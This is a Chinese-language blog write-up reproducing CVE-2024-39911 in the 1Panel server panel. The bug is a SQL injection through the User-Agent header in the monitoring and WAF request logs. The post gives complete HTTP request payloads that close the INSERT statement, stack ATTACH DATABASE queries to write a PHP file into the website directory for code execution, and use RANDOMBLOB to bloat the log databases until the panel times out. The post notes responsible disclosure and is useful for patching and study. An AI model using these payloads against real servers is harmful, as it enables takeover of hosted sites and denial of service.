1Panel面板前台sql注入到网站功能rce漏洞(CVE-2024-39911)

Author： Juneha
发布时间：June 8, 2024
8357 views
6 comments
632 words
Categories：代码审计漏洞复现

0x00 1Panel 架构

1Panel 大致架构如下，面板本身是运行在宿主机上的，搭建的网站运行的其他服务等都是在docker内

请求日志，访问日志是在1panel/openresty容器里面的各种.db文件里面存储着，通过lua文件写入的, waf功能以及网站监控功能也是在1panel/openresty容器内实现并存储的,然后面板去读取展示

复现视频 https://www.bilibili.com/video/BV1tt8ue6EmU/

漏洞在6月初发现，反馈给1p官方后，六月中修复，7月中漏洞公开

0x1 测试版本

专业版 v1.10.10-lts
社区版 v1.10.10-lts
1panel/openresty:1.21.4.3-3-1-focal

0x2 影响范围

网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal
WAF功能影响 <= 1panel/openresty:1.21.4.3-3-1-focal

0x3 网站监控功能

利用条件:

专业版,并开启网站监控功能
关闭waf功能
安装有1P-openresty容器且搭建有php环境网站

3.1 发现注入

这里会记录请求日志

他记录的字段有 re ua头等

在记录的字段上加上单引号会发现没有成功记录日志，猜测这里存在一个inser的sql注入

进一步验证因为数据库是sqlite,我们尝试一下字符串拼功能最后记录是啥样子的,发送数据包

User-Agent: Mozilla/5.0'||"blog.mo60.cn"||'b

发现字符串被拼接了，确定了这里存在一个insert的注入

3.2 文件定位

这个功能的数据库在

/usr/local/openresty/1pwaf/data/db/sites/网站编号/site_req_logs.db

或者在宿主机的

/opt/1panel/apps/openresty/openresty/1pwaf/data/db/sites/网站代号

写入数据库语句的脚本在

/usr/local/openresty/1pwaf/lib/monitor_log.lua

执行的sql语句如下

INSERT INTO site_req_logs (
            server_name, host,ip, ip_iso, ip_country_zh,
            ip_country_en, ip_province_zh, ip_province_en, 
            uri, user_agent, method, status_code, referer,
            spider, request_time, localtime, time, request_uri,
            flow, day, hour, uv_id, referer_domain,
            os,browser,device,pv_tag,uv_tag
        ) VALUES (
            '%s', '%s', '%s', '%s', '%s',
            '%s', '%s', '%s', 
            '%s', '%s', '%s', %d, '%s',
            '%s', %d, DATETIME('now'), %f, '%s',
            %d, '%s', '%s', '%s', '%s',
            '%s', '%s', '%s','%s','%s'
        )

我们可控的位置在user_agent头也就是

VALUES (
            '%s', '%s', '%s', '%s', '%s',
            '%s', '%s', '%s', 
            '可控点', '%s', '%s', %d, '%s',
            '%s', %d, DATETIME('now'), %f, '%s',
            %d, '%s', '%s', '%s', '%s',
            '%s', '%s', '%s','%s','%s'
        )

3.3 Getshell

这里我们先测试一下存不存在堆叠注入,先闭合前面的然后在构造插入新语句的poc

GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');INSERT INTO "main"."site_req_logs" ("id", "server_name", "host", "ip", "ip_iso", "ip_country_zh", "ip_country_en", "ip_province_zh", "ip_province_en", "ip_longitude", "ip_latitude", "uri", "user_agent", "method", "status_code", "referer", "spider", "request_time", "localtime", "time", "request_uri", "flow", "day", "hour", "uv_id", "referer_domain", "os", "browser", "device", "pv_tag", "uv_tag")VALUES (18, '192.168.99.6', '192.168.99.6', '192.168.99.2', 'Local', 'blog.mo60.cn', 'Intranet', '', '', NULL, NULL, '/blog.mo60.cn', 'blog.mo60.cn', 'blog.mo60.cn', 114514, '', '', 1, '2024-06-09 08:16:52', 1717921010.847, '/aa', 552, '2024-06-09', '16', '', '', 'windows', 'edge', 'pc', '', '');#
Connection: close

可以看到插入了我们的语句

那么我们的思路是通过堆叠注入写出文件,到网站目录下,因为网站大部分是支持php的，默认网站路径格式如下

/www/sites/网站代号(默认为域名)/index/

然后构造poc写入文件

ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>');#

然后发送数据包

然后进入容器查看一下，发现文件写入成功

访问成功执行

测试poc

GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#

发送后如果写入文件并输出C930b955726e241e6a7aa1e4184b54e7f就是存在

这个利用方式在开启waf的情况下无法利用，大致示意图

3.4 功能DDOS

这里是利用到RANDOMBLOB 是SQLite数据库中的一个函数，它的主要用途是生成一个指定长度的包含随机字节的二进制大对象(BLOB)。,然后传入一个RANDOMBLOB(39990000)

GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0'||RANDOMBLOB(39990000)||'blog.mo60.cn
Connection: close

发送后来到请求日志查看，直接响应超时功能全部用不了

http://192.168.99.6:13515/xpack/monitor/log

上面的操作导致数据库文件特别大因为生成了太大字节的内容

0x4 WAF功能

利用条件:

开启waf功能
安装有1P-openresty容器且搭建有php环境网站

4.1发现注入

先来一条会触发waf的规则

可以看到在waf拦截记录里面记录了

http://URL/xpack/waf/websites

可以看到记录的字段跟上面也差不多

直接测试有没有注入

User-Agent: Mozilla/5.0'||"blog.mo60.cn"||'b

可以看到最近得到的是拼接后的结果，这里存在注入

4.2文件定位

进入op的到容器里面

docker exec -it 8fbeeb7b4dbc /bin/bash

数据库的路径位于,是SQLite数据库

/usr/local/openresty/1pwaf/data/db/

里面有两个数据库文件,1pwaf.db 跟 req_log.db,一个是记录的waf的开关情况配置等，另外一个是我们需要的请求日志,我们的拦截日志就在这个库里面记录着

然后把db文件拷贝到宿主机上分析一下,后面发现就在1panel的文件路径里面就有不需要特意进入到容器/opt/1panel/

docker cp 8fbeeb7b4dbc:/usr/local/openresty/1pwaf/data/db/req_log.db .

可以看到我们的拦截记录就在这里面

然后通过搜索找到的插入语句在

/usr/local/openresty/1pwaf/lib/attack_log.lua

打开可以看到执行的sql语句

INSERT INTO req_logs (
        id, ip, ip_iso, ip_country_zh, ip_country_en,
        ip_province_zh, ip_province_en, ip_longitude, ip_latitude, localtime, 
        time,server_name,  website_key, host, method,
        uri, user_agent, exec_rule, rule_type, match_rule, match_value,
        nginx_log, blocking_time, action, is_block, is_attack
    ) VALUES (
        '%s', '%s', '%s', '%s', '%s',
        '%s', '%s', %d, %d, DATETIME('now'),
         %f,  '%s', '%s', '%s', '%s',
         '%s', '%s', '%s', '%s', '%s', '%s', 
         '%s', %d, '%s', %d, %d
    )

我们的可控点在第二个插入参数的位置

VALUES (
        '%s', '%s', '%s', '%s', '%s',
        '%s', '%s', %d, %d, DATETIME('now'),
         %f,  '%s', '%s', '%s', '%s',
         '%s', '可控点', '%s', '%s', '%s', '%s', 
         '%s', %d, '%s', %d, %d
    )

4.3 Getshell

先构造好poc

ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#

然后这里利用ua头位置注入来写入文件

GET /.git/config HTTP/1.1
Host: 192.168.99.6
User-Agent: blog.mo60.cn',"args", "sqlInjectA", "", "YmxvZy5tbzYwLmNu", "blog.mo60.cn", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#
Connection: close

访问成功执行

这里利用只要开启waf功能即可

4.4 功能DDOS

还是利用生成一大堆数据，然后让这个接口响应超时

GET /.git/config HTTP/1.1
Host: 192.168.99.6
User-Agent: blog.mo60.cn'||RANDOMBLOB(79990000)||'blog.mo60.cn
Connection: close

然后来到拦截日志，开始转圈圈

然后过一会提示请求错误

Last modification：July 22, 2024

本文作者：Juneha
本文链接：https://blog.mo60.cn/index.php/archives/1Panel_SQLinjection2Rce.html
版权声明：本博客所有文章除特别声明外，均默认采用 CC BY-NC-SA 4.0 许可协议。
法律说明：
文章声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任，本人坚决反对利用文章内容进行恶意攻击行为，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全，本文内容未隐讳任何个人、群体、公司。非文学作品，请勿过度理解，根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途。

如果觉得我的文章对你有用，请随意赞赏,可备注留下ID方便感谢

6 comments

潜心学习的道士
2024-11-01 15:52

该评论仅登录用户及评论双方可见

Reply
1. Juneha
  2024-11-01 22:15
  
  @潜心学习的道士
  
  该评论仅登录用户及评论双方可见
  
  Reply
fzr123
2024-10-14 17:07

tql

Reply
nukaka
2024-10-11 14:43

大佬nb，学习到了

Reply
知名的贫僧
2024-07-20 02:20

该评论仅登录用户及评论双方可见

Reply
1. Juneha
  2024-07-20 12:36
  
  @知名的贫僧
  
  该评论仅登录用户及评论双方可见
  
  Reply

1Panel面板前台sql注入到网站功能rce漏洞(CVE-2024-39911)

Juneha • 2024 年 06 月 08 日

<h2>0x00 1Panel 架构</h2>1Panel 大致架构如下，面板本身是运行在宿主机上的，搭建的网站运行的其他服务等都是在docker内<img src="https://blog.mo60.cn/usr/uploads/2024/07/2299299793.png" alt="34085-mhf27my8169.png" title="34085-mhf27my8169.png"style="">请求日志，访问日志是在<code>1panel/openresty</code>容器里面的各种.db文件里面存储着，通过lua文件写入的, waf功能以及网站监控功能也是在<code>1panel/openresty</code>容器内实现并存储的,然后面板去读取展示<img src="https://blog.mo60.cn/usr/uploads/2024/07/2222020475.png" alt="90461-kapnrjfpl4p.png" title="90461-kapnrjfpl4p.png"style="">复现视频 <a class="no-external-link" href="https://www.bilibili.com/video/BV1tt8ue6EmU/" target="_blank">https://www.bilibili.com/video/BV1tt8ue6EmU/</a>漏洞在6月初发现，反馈给1p官方后，六月中修复，7月中漏洞公开<h2>0x1 测试版本</h2>专业版 <code>v1.10.10-lts</code> 社区版 <code>v1.10.10-lts</code> <code>1panel/openresty:1.21.4.3-3-1-focal</code><h2>0x2 影响范围</h2>网站监控功能影响 == <code>1panel/openresty:1.21.4.3-3-1-focal</code> WAF功能影响 &lt;= <code>1panel/openresty:1.21.4.3-3-1-focal</code><h2>0x3 网站监控功能</h2>利用条件:<ul><li>专业版,并开启网站监控功能</li><li>关闭waf功能</li><li>安装有1P-openresty容器且搭建有php环境网站</li></ul><h3>3.1 发现注入</h3>这里会记录请求日志<img src="https://blog.mo60.cn/usr/uploads/2024/06/2860837733.png" alt="54024-mck2p3v6af.png" title="54024-mck2p3v6af.png"style="">他记录的字段有 re ua头等<img src="https://blog.mo60.cn/usr/uploads/2024/06/920126437.png" alt="77768-th6p61i1lg.png" title="77768-th6p61i1lg.png"style="">在记录的字段上加上单引号会发现没有成功记录日志，猜测这里存在一个inser的sql注入<img src="https://blog.mo60.cn/usr/uploads/2024/06/2262924585.png" alt="73269-c7hf6jhpnmh.png" title="73269-c7hf6jhpnmh.png"style="">进一步验证因为数据库是sqlite,我们尝试一下字符串拼功能最后记录是啥样子的,发送数据包<pre><code>User-Agent: Mozilla/5.0'||&quot;blog.mo60.cn&quot;||'b</code></pre>发现字符串被拼接了，确定了这里存在一个insert的注入<img src="https://blog.mo60.cn/usr/uploads/2024/06/923456268.png" alt="84966-m75osymtreg.png" title="84966-m75osymtreg.png"style=""><h3>3.2 文件定位</h3>这个功能的数据库在<pre><code>/usr/local/openresty/1pwaf/data/db/sites/网站编号/site_req_logs.db</code></pre>或者在宿主机的<pre><code>/opt/1panel/apps/openresty/openresty/1pwaf/data/db/sites/网站代号</code></pre>写入数据库语句的脚本在<pre><code>/usr/local/openresty/1pwaf/lib/monitor_log.lua</code></pre>执行的sql语句如下 <img src="https://blog.mo60.cn/usr/uploads/2024/06/2285565036.png" alt="54224-utnmrnt1m6t.png" title="54224-utnmrnt1m6t.png"style=""><pre><code>INSERT INTO site_req_logs (
 server_name, host,ip, ip_iso, ip_country_zh,
 ip_country_en, ip_province_zh, ip_province_en, 
 uri, user_agent, method, status_code, referer,
 spider, request_time, localtime, time, request_uri,
 flow, day, hour, uv_id, referer_domain,
 os,browser,device,pv_tag,uv_tag
 ) VALUES (
 '%s', '%s', '%s', '%s', '%s',
 '%s', '%s', '%s', 
 '%s', '%s', '%s', %d, '%s',
 '%s', %d, DATETIME('now'), %f, '%s',
 %d, '%s', '%s', '%s', '%s',
 '%s', '%s', '%s','%s','%s'
 )</code></pre>我们可控的位置在user_agent头也就是<pre><code>VALUES (
 '%s', '%s', '%s', '%s', '%s',
 '%s', '%s', '%s', 
 '可控点', '%s', '%s', %d, '%s',
 '%s', %d, DATETIME('now'), %f, '%s',
 %d, '%s', '%s', '%s', '%s',
 '%s', '%s', '%s','%s','%s'
 )</code></pre><h3>3.3 Getshell</h3>这里我们先测试一下存不存在堆叠注入,先闭合前面的然后在构造插入新语句的poc<pre><code>GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');INSERT INTO &quot;main&quot;.&quot;site_req_logs&quot; (&quot;id&quot;, &quot;server_name&quot;, &quot;host&quot;, &quot;ip&quot;, &quot;ip_iso&quot;, &quot;ip_country_zh&quot;, &quot;ip_country_en&quot;, &quot;ip_province_zh&quot;, &quot;ip_province_en&quot;, &quot;ip_longitude&quot;, &quot;ip_latitude&quot;, &quot;uri&quot;, &quot;user_agent&quot;, &quot;method&quot;, &quot;status_code&quot;, &quot;referer&quot;, &quot;spider&quot;, &quot;request_time&quot;, &quot;localtime&quot;, &quot;time&quot;, &quot;request_uri&quot;, &quot;flow&quot;, &quot;day&quot;, &quot;hour&quot;, &quot;uv_id&quot;, &quot;referer_domain&quot;, &quot;os&quot;, &quot;browser&quot;, &quot;device&quot;, &quot;pv_tag&quot;, &quot;uv_tag&quot;)VALUES (18, '192.168.99.6', '192.168.99.6', '192.168.99.2', 'Local', 'blog.mo60.cn', 'Intranet', '', '', NULL, NULL, '/blog.mo60.cn', 'blog.mo60.cn', 'blog.mo60.cn', 114514, '', '', 1, '2024-06-09 08:16:52', 1717921010.847, '/aa', 552, '2024-06-09', '16', '', '', 'windows', 'edge', 'pc', '', '');#
Connection: close</code></pre>可以看到插入了我们的语句<img src="https://blog.mo60.cn/usr/uploads/2024/06/3922603103.png" alt="58819-8iadv9n3g6.png" title="58819-8iadv9n3g6.png"style="">那么我们的思路是通过堆叠注入写出文件,到网站目录下,因为网站大部分是支持php的，默认网站路径格式如下<pre><code>/www/sites/网站代号(默认为域名)/index/</code></pre>然后构造poc写入文件<pre><code>ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?php phpinfo();?&gt;');#</code></pre>然后发送数据包<img src="https://blog.mo60.cn/usr/uploads/2024/06/2449810426.png" alt="80588-5f91688fbto.png" title="80588-5f91688fbto.png"style="">然后进入容器查看一下，发现文件写入成功<img src="https://blog.mo60.cn/usr/uploads/2024/06/1415654614.png" alt="58230-vmlteiqvtmq.png" title="58230-vmlteiqvtmq.png"style="">访问成功执行<img src="https://blog.mo60.cn/usr/uploads/2024/06/3250933346.png" alt="27475-qq3xv8pi72i.png" title="27475-qq3xv8pi72i.png"style="">测试poc<pre><code>GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?= md5(&quot;blog.mo60.cn&quot;); ?&gt;');#
</code></pre>发送后如果写入文件并输出<code>C930b955726e241e6a7aa1e4184b54e7f</code>就是存在<img src="https://blog.mo60.cn/usr/uploads/2024/06/3358073358.png" alt="96431-e1z02na9ud.png" title="96431-e1z02na9ud.png"style="">这个利用方式在开启waf的情况下无法利用，大致示意图<img src="https://blog.mo60.cn/usr/uploads/2024/07/933116448.png" alt="44326-xbi7siltexi.png" title="44326-xbi7siltexi.png"style=""><h3>3.4 功能DDOS</h3>这里是利用到<code>RANDOMBLOB 是SQLite数据库中的一个函数，它的主要用途是生成一个指定长度的包含随机字节的二进制大对象(BLOB)。</code>,然后传入一个<code>RANDOMBLOB(39990000)</code><pre><code>GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0'||RANDOMBLOB(39990000)||'blog.mo60.cn
Connection: close</code></pre>发送后来到请求日志查看，直接响应超时功能全部用不了<pre><code>http://192.168.99.6:13515/xpack/monitor/log</code></pre><img src="https://blog.mo60.cn/usr/uploads/2024/06/4154199629.png" alt="30547-cvqi2iqiek4.png" title="30547-cvqi2iqiek4.png"style="">上面的操作导致数据库文件特别大因为生成了太大字节的内容<img src="https://blog.mo60.cn/usr/uploads/2024/06/2308194125.png" alt="14952-je0w6kvvrab.png" title="14952-je0w6kvvrab.png"style=""><h2>0x4 WAF功能</h2>利用条件:<ul><li>开启waf功能</li><li>安装有1P-openresty容器且搭建有php环境网站</li></ul><h3>4.1发现注入</h3>先来一条会触发waf的规则<img src="https://blog.mo60.cn/usr/uploads/2024/06/3468671364.png" alt="64904-117jso5e9la9.png" title="64904-117jso5e9la9.png"style="">可以看到在waf拦截记录里面记录了<pre><code>http://URL/xpack/waf/websites</code></pre><img src="https://blog.mo60.cn/usr/uploads/2024/06/4119429834.png" alt="31583-o075u709kl.png" title="31583-o075u709kl.png"style="">可以看到记录的字段跟上面也差不多<img src="https://blog.mo60.cn/usr/uploads/2024/06/1487655147.png" alt="36923-jukq0to3ww.png" title="36923-jukq0to3ww.png"style="">直接测试有没有注入<pre><code>User-Agent: Mozilla/5.0'||&quot;blog.mo60.cn&quot;||'b</code></pre>可以看到最近得到的是拼接后的结果，这里存在注入<img src="https://blog.mo60.cn/usr/uploads/2024/06/1458821113.png" alt="78717-bn4faiug3u.png" title="78717-bn4faiug3u.png"style=""><h3>4.2文件定位</h3>进入op的到容器里面<pre><code>docker exec -it 8fbeeb7b4dbc /bin/bash</code></pre>数据库的路径位于,是SQLite数据库<pre><code>/usr/local/openresty/1pwaf/data/db/</code></pre>里面有两个数据库文件,<code>1pwaf.db</code> 跟 <code>req_log.db</code>,一个是记录的waf的开关情况配置等，另外一个是我们需要的请求日志,我们的拦截日志就在这个库里面记录着<img src="https://blog.mo60.cn/usr/uploads/2024/06/2652911413.png" alt="38921-k80g3gf9fc.png" title="38921-k80g3gf9fc.png"style="">然后把db文件拷贝到宿主机上分析一下,后面发现就在1panel的文件路径里面就有不需要特意进入到容器<code>/opt/1panel/</code><pre><code>docker cp 8fbeeb7b4dbc:/usr/local/openresty/1pwaf/data/db/req_log.db .</code></pre>可以看到我们的拦截记录就在这里面<img src="https://blog.mo60.cn/usr/uploads/2024/06/438889159.png" alt="45739-wjadhcs5n5k.png" title="45739-wjadhcs5n5k.png"style="">然后通过搜索找到的插入语句在<pre><code>/usr/local/openresty/1pwaf/lib/attack_log.lua</code></pre>打开可以看到执行的sql语句<img src="https://blog.mo60.cn/usr/uploads/2024/06/1232270155.png" alt="84835-2s8mjzqjhtg.png" title="84835-2s8mjzqjhtg.png"style=""><pre><code>INSERT INTO req_logs (
 id, ip, ip_iso, ip_country_zh, ip_country_en,
 ip_province_zh, ip_province_en, ip_longitude, ip_latitude, localtime, 
 time,server_name, website_key, host, method,
 uri, user_agent, exec_rule, rule_type, match_rule, match_value,
 nginx_log, blocking_time, action, is_block, is_attack
 ) VALUES (
 '%s', '%s', '%s', '%s', '%s',
 '%s', '%s', %d, %d, DATETIME('now'),
 %f, '%s', '%s', '%s', '%s',
 '%s', '%s', '%s', '%s', '%s', '%s', 
 '%s', %d, '%s', %d, %d
 )</code></pre>我们的可控点在第二个插入参数的位置<pre><code>VALUES (
 '%s', '%s', '%s', '%s', '%s',
 '%s', '%s', %d, %d, DATETIME('now'),
 %f, '%s', '%s', '%s', '%s',
 '%s', '可控点', '%s', '%s', '%s', '%s', 
 '%s', %d, '%s', %d, %d
 )</code></pre><h3>4.3 Getshell</h3>先构造好poc<pre><code>ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?= md5(&quot;blog.mo60.cn&quot;); ?&gt;');#</code></pre>然后这里利用ua头位置注入来写入文件<pre><code>GET /.git/config HTTP/1.1
Host: 192.168.99.6
User-Agent: blog.mo60.cn',&quot;args&quot;, &quot;sqlInjectA&quot;, &quot;&quot;, &quot;YmxvZy5tbzYwLmNu&quot;, &quot;blog.mo60.cn&quot;, 0, &quot;deny&quot;, 0, 1);ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?= md5(&quot;blog.mo60.cn&quot;); ?&gt;');#
Connection: close</code></pre><img src="https://blog.mo60.cn/usr/uploads/2024/06/2486712121.png" alt="58723-02pmtls4gs3q.png" title="58723-02pmtls4gs3q.png"style="">访问成功执行<img src="https://blog.mo60.cn/usr/uploads/2024/06/1277290043.png" alt="47350-n1iob8sn3z.png" title="47350-n1iob8sn3z.png"style=""><code>这里利用只要开启waf功能即可</code><h3>4.4 功能DDOS</h3>还是利用生成一大堆数据，然后让这个接口响应超时<pre><code>GET /.git/config HTTP/1.1
Host: 192.168.99.6
User-Agent: blog.mo60.cn'||RANDOMBLOB(79990000)||'blog.mo60.cn
Connection: close</code></pre>然后来到拦截日志，开始转圈圈<img src="https://blog.mo60.cn/usr/uploads/2024/06/4051109451.png" alt="86580-d1b3g7jn0uf.png" title="86580-d1b3g7jn0uf.png"style="">然后过一会提示请求错误<img src="https://blog.mo60.cn/usr/uploads/2024/06/4050549604.png" alt="22426-miscb82dww9.png" title="22426-miscb82dww9.png"style="">

1Panel面板前台sql注入到网站功能rce漏洞(CVE-2024-39911)

0x00 1Panel 架构

0x1 测试版本

0x2 影响范围

0x3 网站监控功能

3.1 发现注入

3.2 文件定位

3.3 Getshell

3.4 功能DDOS

0x4 WAF功能

4.1发现注入

4.2文件定位

4.3 Getshell

4.4 功能DDOS

6 comments

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。

题目+答案+2023年全国职业院校技能大赛信息安全管理与评估真题

2023年全国职业院校技能大赛信息安全管理与评估-3阶段web复盘模拟解析

后渗透神器Cobalt Strike使用教程

1Panel面板前台sql注入到网站功能rce漏洞(CVE-2024-39911)

记第一次cve申请之旅

后渗透神器Cobalt Strike使用教程

十四届大学生竞赛-easysql

2023年全国职业院校技能大赛信息安全管理与评估-3阶段web复盘模拟解析

shift后门制作

PHPstudy + VScode + PHP Xdebug 调试环境

1Panel面板前台sql注入到网站功能rce漏洞(CVE-2024-39911)

0x00 1Panel 架构

0x1 测试版本

0x2 影响范围

0x3 网站监控功能

3.1 发现注入

3.2 文件定位

3.3 Getshell

3.4 功能DDOS

0x4 WAF功能

4.1发现注入

4.2文件定位

4.3 Getshell

4.4 功能DDOS

6 comments

Leave a Comment Cancel reply 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。

1Panel面板前台sql注入到网站功能rce漏洞(CVE-2024-39911)

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。